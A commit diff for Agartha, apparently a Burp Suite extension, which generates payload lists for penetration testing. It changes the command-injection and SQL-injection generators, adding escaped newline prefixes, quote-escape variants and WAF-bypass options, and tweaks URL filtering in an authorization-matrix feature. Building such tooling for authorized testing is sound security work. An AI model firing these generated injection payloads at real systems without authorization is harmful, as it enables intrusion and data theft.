Projects STRLCPY agartha Commits f9449924
  • ■ ■ ■ ■ ■ ■
    skipped 15 lines
    16 16  except:
    17 17   print "==== ERROR ====" + "\n\nFailed to load dependencies.\n" +str(sys.exc_info()[1]) +"\n\n==== ERROR ====\n\n"
    18 18   
    19  -VERSION = "0.9"
     19 +VERSION = "0.95"
    20 20   
    21 21  class BurpExtender(IBurpExtender, ITab, IMessageEditorController, IContextMenuFactory):
    22 22  
    skipped 12 lines
    35 35   callbacks.registerContextMenuFactory(self)
    36 36   callbacks.issueAlert("The extension has been loaded.")
    37 37   self.tableMatrixReset(self)
    38  - print "Agartha(v" + VERSION + ") is a security tool for:\n\t\t* Local File Inclusion, Directory Traversal,\n\t\t* Command Injection, Code Execution,\n\t\t* SQL Injections,\n\t\t* Authentication/Authorization Access Matrix,\n\t\t* Http request to Javascript conversion.\n\nFor more information and tutorial how to use, please visit:\n\t\t\n\nAuthor:\tVolkan Dindar\n\t\t\t\[email protected]"
     38 + print "Agartha(v" + VERSION + ") is a security tool for:\n\t\t* Local File Inclusion, Directory Traversal\n\t\t* Command Injection, RCE\n\t\t* SQL Injections\n\t\t* Access Violations, Authentication/Authorization Matrix\n\t\t* Http request to Javascript conversion\n\nFor more information and tutorial how to use, please visit:\n\t\t\n\nAuthor:\tVolkan Dindar\n\t\t\t\[email protected]"
    39 39   return
    40 40   
    41 41   def authMatrixThread(self, ev):
    skipped 121 lines
    163 163   self.userNamesHttpUrls.append([])
    164 164   
    165 165   urlList = []
    166  - for x in range(0,self.tableMatrix.getRowCount()):
     166 + for x in range(0, self.tableMatrix.getRowCount()):
    167 167   urlList.append(str(self.tableMatrix.getValueAt(x, 0)))
    168  -
    169 168   for _url in set(self._tbAuthURL.getText().split('\n')):
    170 169   _url = _url.strip()
    171  - if _url and not any(re.findall(r'(log|sign).*(off|out)', _url, re.IGNORECASE)):
     170 + _ext = os.path.splitext(urlparse.urlparse(_url).path)[1]
     171 + if _url and not any(re.findall(r'(log|sign|time).*(off|out)', _url, re.IGNORECASE)) and not any(re.findall(r'^\.(gif|jpg|jpeg|png|css|js|ico|svg|eot|woff|woff2|ttf)$', _ext, re.IGNORECASE)):
    172 172   # ignore logout, signoff, etc. paths
    173 173   if _url not in self.userNamesHttpUrls[self.userCount]:
    174 174   # check first if the url exist in user's url list
    skipped 5 lines
    180 180   self._tbAuthURL.setText("")
    181 181   self._btnAuthRun.setEnabled(True)
    182 182   self._btnAuthReset.setEnabled(True)
    183  - self._lblAuthNotification.text = self._tbAuthNewUser.text + " added successfully!"
     183 + self._lblAuthNotification.text = self._tbAuthNewUser.text + " added successfully! Possible session terminators (log|sign|time - off|out), and file extensions (gif, jpg, jpeg, png, css, js, ico, svg, eot, woff, woff2, ttf) have been filtered out!"
    184 184   self._lblAuthNotification.setForeground (
    185 185   self._cbAuthColoring.setEnabled(True)
    186 186   self._cbAuthGETPOST.setEnabled(True)
    skipped 93 lines
    280 280   
    281 281   def funcCommandInj(self, ev):
    282 282   listCommandInj = []
    283  - prefixes = ["", "\\n", "\\r\\n", "%0a", "%0d%0a"]
    284  - escapeChars = ["", "'", "\\'", "\"", "\\\""]
     283 + prefixes = ["", "\\n", "\\\\n", "\\r\\n", "\\\\r\\\\n", "%0a", "%0d%0a"]
     284 + escapeChars = ["", "'", "\\'", "\\\\'", "\"", "\\\"", "\\\\\""]
    285 285   separators = ["&", "&&", "|", "||", ";"]
    286 286  
    287 287   for prefix in prefixes:
    288 288   for separator in separators:
    289 289   for escapeChar in escapeChars:
     290 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")):
     291 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")):
     292 + continue
    290 293   listCommandInj.append(prefix + escapeChar + separator + self._txtTargetPath.text + separator + escapeChar + "\n")
    291 294   listCommandInj.append(prefix + escapeChar + separator + self._txtTargetPath.text + escapeChar + "\n")
    292 295   listCommandInj.append(prefix + escapeChar + separator + escapeChar + self._txtTargetPath.text + "\n")
    293 296   listCommandInj.append(prefix + escapeChar + separator + "`" + self._txtTargetPath.text + "`" + separator + escapeChar + "\n")
    294 297   listCommandInj.append(prefix + escapeChar + separator + "`" + self._txtTargetPath.text + "`" + escapeChar + "\n")
    295  -
    296 298   listCommandInj.append(prefix + separator + "`" + self._txtTargetPath.text + "`" + separator + "\n")
    297 299   listCommandInj.append(prefix + separator + "`" + self._txtTargetPath.text + "`" + "\n")
    298  -
    299 300   listCommandInj.append(prefix + self._txtTargetPath.text + "\n")
    300 301   listCommandInj.append(prefix + "`" + self._txtTargetPath.text + "`" + "\n")
    301 302   
    skipped 101 lines
    403 404   return
    404 405   
    405 406   listSQLi = []
    406  - prefixes = ["", "\\n", "\\r\\n", "%0a", "0x0a", "%0d%0a", "0x0d0a", "%00", "0x00"]
    407  - escapeChars = ["", "'", "\\'"]
     407 + prefixes = ["", "\\n", "\\\\n", "\\r\\n", "\\\\r\\\\n", "%0a", "0x0a", "%0d%0a", "0x0d0a", "%00", "0x00"]
     408 + escapeChars = ["", "'", "\\'", "\\\\'"]
    408 409   if not self._cbSqlWafBypass.isSelected():
    409 410   prefixes = [""]
    410 411   escapeChars = ["", "'"]
    411  - 
    412 412   n1 = str(random.randint(10, 70))
    413 413   n2 = str(random.randint(71, 99))
    414 414   boolExpressions = [n1 + "=" + n1, n1 + "<" + n2]
    skipped 5 lines
    420 420   for escapeChar in escapeChars:
    421 421   for boolExpression in boolExpressions:
    422 422   for suffix in suffixes[1:]:
     423 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")):
     424 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")):
     425 + continue
    423 426   listSQLi.append(prefix + escapeChar + " or " + boolExpression + suffix + "\n")
    424 427   if not escapeChar:
    425 428   listSQLi.append(prefix + " or " + boolExpression + "\n")
    426 429   for prefix in prefixes:
    427 430   for escapeChar in escapeChars[1:]:
    428 431   for suffix in suffixes[1:]:
     432 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")):
     433 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")):
     434 + continue
    429 435   listSQLi.append(prefix + escapeChar + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + "\n")
    430 436   listSQLi.append(prefix + escapeChar + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + suffix + "\n")
    431 437   listSQLi.append(prefix + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + "\n")
    432 438   listSQLi.append(prefix + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + suffix + "\n")
    433  -
    434 439  
    435 440   if self._cbOrderBased.isSelected():
    436 441   for prefix in prefixes:
    437 442   for escapeChar in escapeChars:
    438 443   for suffix in suffixes[1:]:
    439 444   for i in range(int(self._cbOrderDepth.getSelectedItem())):
     445 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")):
     446 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")):
     447 + continue
    440 448   listSQLi.append(prefix + escapeChar + " order by " + str(i+1) + suffix + "\n")
    441 449   if not escapeChar:
    442 450   listSQLi.append(prefix + escapeChar + " order by " + str(i+1) + "\n")
    skipped 4 lines
    447 455   for escapeChar in escapeChars:
    448 456   for suffix in suffixes[1:]:
    449 457   for union in unions:
     458 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")):
     459 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")):
     460 + continue
    450 461   unionPhrase = " union all select "
    451 462   for i in range(int(self._cbUnionDepth.getSelectedItem())):
    452 463   unionPhrase += union
    skipped 65 lines
    518 529   for prefix in prefixes:
    519 530   for escapeChar in escapeChars:
    520 531   for suffix in suffixes[1:]:
     532 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")):
     533 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")):
     534 + continue
    521 535   if self._cbOracleBased.isSelected():
    522 536   if self._cbStackedSQL.isSelected():
    523 537   if escapeChar:
    skipped 281 lines
    805 819   # panel center
    806 820   self._lblAuthNotification = JLabel("", SwingConstants.LEFT)
    807 821   self.tableMatrix = []
    808  - self.tableMatrix_DM = CustomDefaultTableModel(self.tableMatrix, ('URLS','NoAuth'))
     822 + self.tableMatrix_DM = CustomDefaultTableModel(self.tableMatrix, ('URLs','NoAuth'))
    809 823   self.tableMatrix = JTable(self.tableMatrix_DM)
    810 824   self.tableMatrix.setAutoCreateRowSorter(False)
    811 825   self.tableMatrix.setSelectionForeground(
    skipped 40 lines
    852 866   self.editorPaneInfo.setContentType("text/html");
    853 867   htmlString ="<html>"
    854 868   htmlString +="<div><h3>Author: Volkan Dindar, Github Repo:</h3>"
    855  - htmlString +="<h1>Agartha { LFI | RCE | Auth | SQL Injection | Http->Js }</h1>"
     869 + htmlString +="<h1>Agartha { LFI | RCE | SQLi | Auth | Http->Js }</h1>"
    856 870   htmlString +="<p>Agartha is a penetration testing tool which creates dynamic payload lists and user access matrix to reveal injection flaws and authentication/authorization issues. There are many different attack payloads alredy exist, but Agartha creates run-time, systematic and vendor-neutral payloads with many different possibilities and bypassing methods. It also draws attention to user session and URL relationships, which makes easy to find user access violations. And additionally, it converts Http requests to JavaScript to help digging up XSS issues more. In summary:</p><ul>"
    857 871   htmlString +="<li><strong>Payload Generator</strong>: It creates payloads/wordlists for different attack types.<ul>"
    858 872   htmlString +="<li><strong>Local File Inclusion, Directory Traversal</strong>: It creates file dictionary lists with various encoding and escaping characters.</li>"
    skipped 87 lines
    946 960   self._lblStatusLabel = JLabel()
    947 961   self._lblStatusLabel.setText("Please provide a path for payload generation!")
    948 962   self._txtTargetPath = JTextField(self._txtDefaultLFI, 30)
    949  - self._rbDictLFI = JRadioButton('LFI/DT', True, itemStateChanged=self.funcRBSelection);
    950  - self._rbDictLFI.setToolTipText("It generates payload for Local File Inclusion, Directory Traversal.")
     963 + self._rbDictLFI = JRadioButton('LFI / DT', True, itemStateChanged=self.funcRBSelection);
     964 + self._rbDictLFI.setToolTipText("Payload generation for Local File Inclusion, Directory Traversal.")
    951 965   self._rbDictCommandInj = JRadioButton('Command Inj / RCE', itemStateChanged=self.funcRBSelection)
    952  - self._rbDictCommandInj.setToolTipText("It generates payload for Command Injection, Remote Code Execution.")
     966 + self._rbDictCommandInj.setToolTipText("Payload generation for Command Injection, Remote Code Execution.")
    953 967   self._rbDictSQLi = JRadioButton('SQL Injection', itemStateChanged=self.funcRBSelection)
    954  - self._rbDictSQLi.setToolTipText("It generates payload for various type of SQL attacks.")
     968 + self._rbDictSQLi.setToolTipText("Payload generation for various type of SQL attacks.")
    955 969   _rbDictCheatSheet = JRadioButton('Cheat Sheet', itemStateChanged=self.funcRBSelection)
    956 970   _rbDictFuzzer = JRadioButton('Fuzzer', itemStateChanged=self.funcRBSelection)
    957 971   _rbPanel = JPanel()
    skipped 9 lines
    967 981   self._cbDictWafBypass = JCheckBox('Waf Bypass', True)
    968 982   self._cbDictWafBypass.setToolTipText("It includes bypass techniques like null bytes, various type of encodings, different file extensions, etc.")
    969 983   self._cbDictEquality = JCheckBox(')', False)
    970  - self._cbDictEquality.setToolTipText("Generate payloads only for some certain folder depth.")
     984 + self._cbDictEquality.setToolTipText("Generate payloads only for a specific depth.")
    971 985   self._cbDictDepth = JComboBox(list(range(0, 20)))
    972 986   self._cbDictDepth.setSelectedIndex(5)
    973  - self._cbDictDepth.setToolTipText("How deep the folder depth should be?")
     987 + self._cbDictDepth.setToolTipText("Folder depth limit. How much folder above should it go?")
    974 988   _cbDictDepthPanel = JPanel(FlowLayout(FlowLayout.LEADING, 10, 0))
    975 989   _cbDictDepthPanel.add(self._cbDictDepth)
    976 990   self._cbDictCommandInjEncoding = JCheckBox('URL Encoding', False)
    skipped 10 lines
    987 1001   self._cbUnionDepth = JComboBox(list(range(1, 20)))
    988 1002   self._cbUnionDepth.setSelectedIndex(4)
    989 1003   self._cbUnionDepth.setEnabled(False)
    990  - self._cbUnionDepth.setToolTipText("Generates payload till")
     1004 + self._cbUnionDepth.setToolTipText("Column numbers")
    991 1005   self._cbOrderBased = JCheckBox('Order-Based', False, itemStateChanged=self._cbOrderBasedFunc)
    992 1006   self._cbOrderBased.setToolTipText("Order-Based SQL Injection")
    993 1007   self._cbOrderDepth = JComboBox(list(range(1, 20)))
    994 1008   self._cbOrderDepth.setSelectedIndex(4)
    995 1009   self._cbOrderDepth.setEnabled(False)
    996  - self._cbOrderDepth.setToolTipText("Generates payload till")
     1010 + self._cbOrderDepth.setToolTipText("Column numbers")
    997 1011   self._cbBooleanBased = JCheckBox('Boolean-Based', True)
    998 1012   self._cbBooleanBased.setToolTipText("Boolean-Based SQL Injection")
    999 1013   self._cbMssqlBased = JCheckBox('MSSQL', True)
    skipped 69 lines
    1069 1083   
    1070 1084   def tableMatrixReset(self, ev):
    1071 1085   self.tableMatrix = []
    1072  - self.tableMatrix_DM = CustomDefaultTableModel(self.tableMatrix, ('URLS','NoAuth'))
     1086 + self.tableMatrix_DM = CustomDefaultTableModel(self.tableMatrix, ('URLs','NoAuth'))
    1073 1087   self.tableMatrix = JTable(self.tableMatrix_DM)
    1074 1088   self.tableMatrix_SP.getViewport().setView((self.tableMatrix))
    1075 1089   self.userCount = 0
    skipped 7 lines
    1083 1097   self._requestViewer.setMessage("", False)
    1084 1098   self._responseViewer.setMessage("", False)
    1085 1099   self._lblAuthNotification.text = "Please add users to create an auth matrix"
     1100 + self._lblAuthNotification.setForeground (
    1086 1101   self._tbAuthNewUser.setForeground (
    1087 1102   self._txtHeaderDefault = "GET /example HTTP/1.1\nHost:\nAccept-Encoding: gzip,deflate\nConnection: close\nCookie: SessionID=......"
    1088 1103   self._tbAuthHeader.setText(self._txtHeaderDefault)
    skipped 97 lines
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